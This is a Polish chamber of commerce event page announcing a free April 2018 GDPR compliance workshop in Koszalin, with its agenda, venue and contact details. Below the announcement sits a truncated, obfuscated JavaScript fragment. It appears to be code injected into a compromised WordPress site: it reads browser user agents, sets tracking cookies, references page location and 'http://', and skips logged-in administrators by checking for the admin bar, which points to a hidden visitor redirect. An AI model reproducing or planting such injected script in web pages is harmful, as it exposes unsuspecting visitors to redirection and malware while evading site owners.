Zmiany w RODO – praktyczne spotkanie dla przedsiębiorców | Północna Izba Gospodarcza w Koszalinie

W związku z dużym zainteresowaniem dotyczącym Rozporządzenia o Ochronie Danych Osobowych, zapraszamy na drugą edycję!

Polnocna-Izba-zaprasza-praktyczne-porady-Rodo-2018

Dzięki temu szkoleniu dowiecie się Państwo, jakie zmiany czekają przedsiębiorców i jak się na nie praktycznie przygotować.
Jak należy dostosować organizację do nowych przepisów o ochronie danych osobowych i od czego zacząć proces wdrożeniowy? 
Jak wykonać analizę ryzyka zgodnie przepisami RODO? Jakie wyzwania są stawiane przed administratorem danych osobowych oraz inspektorem ochrony danych (IOD)? 
Co zmieni się dla dotychczasowych administratorów bezpieczeństwa informacji (ABI)?
Dowiecie się również jakie są założenia projektu nowej ustawy o ochronie danych osobowych oraz pierwszych wytycznych do przepisów RODO.
 
Termin warsztatów: 18.04.2018
Godzina: 9:00 – 12:00
Miejsce: City Box Koszalin, Rynek Staromiejski 14
 
Warsztaty poprowadzi adwokat Michał Skwira www.skwira.eu
Zapraszamy na bezpłatne warsztaty dla wszystkich firm zrzeszonych w Północnej Izbie Gospodarczej.
Jeżeli nie jesteście Państwo członkiem zapraszamy do wypełnienia deklaracji przystąpienia. Wszystkie informacje dostępne są pod adresem www.pig.koszalin.pl/jak-przystapic/

Jeżeli chcą Państwo uczestniczyć w warsztatach, bez kwestii formalnych prosimy o kontakt z biurem Północnej Izby Gospodarczej w Koszalinie 943411083 lub 537184630 oraz mailowo  koszalin@izba.info 

Potwierdzenie obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie do naszego biura. Ilość miejsc ograniczona, decyduje kolejność zgłoszeń.

ILOŚĆ MIEJSC OGRANICZONA

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m